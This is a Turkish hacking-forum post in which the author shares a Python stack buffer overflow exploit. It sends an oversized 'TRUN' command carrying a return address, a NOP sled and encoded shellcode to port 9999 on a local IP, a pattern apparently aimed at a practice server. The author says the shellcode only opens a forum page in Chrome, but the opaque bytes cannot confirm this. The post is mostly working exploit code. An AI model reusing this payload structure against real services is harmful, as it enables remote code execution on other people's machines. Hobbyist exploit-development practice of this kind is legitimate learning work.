- 19 Şub 2022
- 1,137
- 833
Merhaba, hem forumda merak uyandırmak hemde kendimi ilerletmek adına exploitlere merak salmıştım. birkaç uğraşmadan sonra en sonunda adam akıllı bir exploit yazmayı başardım.(dürüst olmak gerekirse badchar ararken çok zorlandım ve githubdan destek aldım)
yaptığım exploit karşı tarafta reverse shell oluşturmaz veya herhangi bir backdoor oluştumuyor. sadece chrome'dan forumumuzu açıyor.
(eğer chrome yoksa açılmayabilir)
aynı zamanda bir videoda çektim fakat youtube kullanmadığım için dosya tc üzerinden paylaşıyorum .
video için tıkla
not: sadece windows üzerinde çalışmaktadır.
![Smile :) :)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
yaptığım exploit karşı tarafta reverse shell oluşturmaz veya herhangi bir backdoor oluştumuyor. sadece chrome'dan forumumuzu açıyor.
(eğer chrome yoksa açılmayabilir)
aynı zamanda bir videoda çektim fakat youtube kullanmadığım için dosya tc üzerinden paylaşıyorum .
video için tıkla
not: sadece windows üzerinde çalışmaktadır.
Python:
from importlib.machinery import OPTIMIZED_BYTECODE_SUFFIXES
from ipaddress import ip_address
import socket
İP_ADRESS="192.168.1.3" #hedef makina ip adresi
PORT=9999
baglan=socket.socket() # soketimiz.
buf = b""
buf += b"\xb8\x4d\xf3\xc6\xe6\xd9\xed\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x39\x83\xc3\x04\x31\x43\x0f\x03\x43\x42\x11"
buf += b"\x33\x1a\xb4\x57\xbc\xe3\x44\x38\x34\x06\x75\x78\x22"
buf += b"\x42\x25\x48\x20\x06\xc9\x23\x64\xb3\x5a\x41\xa1\xb4"
buf += b"\xeb\xec\x97\xfb\xec\x5d\xeb\x9a\x6e\x9c\x38\x7d\x4f"
buf += b"\x6f\x4d\x7c\x88\x92\xbc\x2c\x41\xd8\x13\xc1\xe6\x94"
buf += b"\xaf\x6a\xb4\x39\xa8\x8f\x0c\x3b\x99\x01\x07\x62\x39"
buf += b"\xa3\xc4\x1e\x70\xbb\x09\x1a\xca\x30\xf9\xd0\xcd\x90"
buf += b"\x30\x18\x61\xdd\xfd\xeb\x7b\x19\x39\x14\x0e\x53\x3a"
buf += b"\xa9\x09\xa0\x41\x75\x9f\x33\xe1\xfe\x07\x98\x10\xd2"
buf += b"\xde\x6b\x1e\x9f\x95\x34\x02\x1e\x79\x4f\x3e\xab\x7c"
buf += b"\x80\xb7\xef\x5a\x04\x9c\xb4\xc3\x1d\x78\x1a\xfb\x7e"
buf += b"\x23\xc3\x59\xf4\xc9\x10\xd0\x57\x87\xe7\x66\xe2\xe5"
buf += b"\xe8\x78\xed\x59\x81\x49\x66\x36\xd6\x55\xad\x73\x28"
buf += b"\x1c\xec\xd5\xa1\xf9\x64\x64\xac\xf9\x52\xaa\xc9\x79"
buf += b"\x57\x52\x2e\x61\x12\x57\x6a\x25\xce\x25\xe3\xc0\xf0"
buf += b"\x9a\x04\xc1\x92\x71\x9f\xc4\x31\xf1\x3a\x39\x95\x6a"
buf += b"\xe5\x4a\x9d\x0d\x97\xd8\x7d\xae\x3f\x53\x11\x5d\xa5"
buf += b"\xb3\x99\xe8\x57\xdf\x09\x73\xfb\x74\xbe\x16\x9a\xe7"
buf += b"\x10\xb7\x2e\x9f\x6c"
komut =b"\x41" * 2003 + b"\xAF\x11\x50\x62" + b"\x90" * 16 + buf + b"\x43" * (5005 - 2003 - 4 - 16-len(buf))
komut2 = b"TRUN /.:/" + komut + b"\r\n"
baglan.connect((İP_ADRESS,PORT)) # bağlan
baglan.send(komut2) # GÖNDER
baglan.recv(120) # geri dönüş
baglan.close()
Son düzenleme: